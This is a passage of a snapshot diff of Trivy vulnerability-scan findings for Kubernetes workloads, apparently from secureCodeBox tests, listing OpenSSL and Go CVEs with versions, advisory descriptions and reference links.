is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "the c_rehash script allows command injection", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://avd.aquasec.com/nvd/cve-2022-2068", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://access.redhat.com/security/cve/CVE-2022-2068", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://ubuntu.com/security/notices/USN-5488-1", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://ubuntu.com/security/notices/USN-5488-2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.debian.org/security/2022/dsa-5169", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.openssl.org/news/secadv/20220621.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220524220425-1d687d428aca", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.1d-0+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3712", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "https://access.redhat.com/security/cve/CVE-2021-3712", + "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-3712.html", + "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://ubuntu.com/security/notices/USN-5051-2", + "https://ubuntu.com/security/notices/USN-5051-3", + "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", ], }, "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "request smuggling", + "name": "openssl: Read buffer overruns processing ASN.1 strings", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + "value": "https://avd.aquasec.com/nvd/cve-2021-3712", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "https://access.redhat.com/security/cve/CVE-2021-3712", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220524220425-1d687d428aca", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", - ], - }, - "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://ubuntu.com/security/notices/USN-5051-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://ubuntu.com/security/notices/USN-5051-3", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220524220425-1d687d428aca", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", - ], - }, - "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://www.tenable.com/security/tns-2022-02", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1d-0+deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0778", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "https://access.redhat.com/errata/RHSA-2022:5326", + "https://access.redhat.com/security/cve/CVE-2022-0778", + "https://bugzilla.redhat.com/2062202", + "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "https://errata.rockylinux.org/RLSA-2022:4899", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "https://linux.oracle.com/cve/CVE-2022-0778.html", + "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220321-0002/", + "https://security.netapp.com/advisory/ntap-20220429-0005/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5328-1", + "https://ubuntu.com/security/notices/USN-5328-2", + "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220315.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.tenable.com/security/tns-2022-06", + "https://www.tenable.com/security/tns-2022-07", + "https://www.tenable.com/security/tns-2022-08", + "https://www.tenable.com/security/tns-2022-09", + ], + }, + "category": "Vulnerability", + "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", + "references": [ { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://avd.aquasec.com/nvd/cve-2022-0778", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://access.redhat.com/errata/RHSA-2022:5326", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-0778", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://bugzilla.redhat.com/2062202", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", - ], - }, - "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://errata.rockylinux.org/RLSA-2022:4899", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", }, { "type": "URL", - "value": 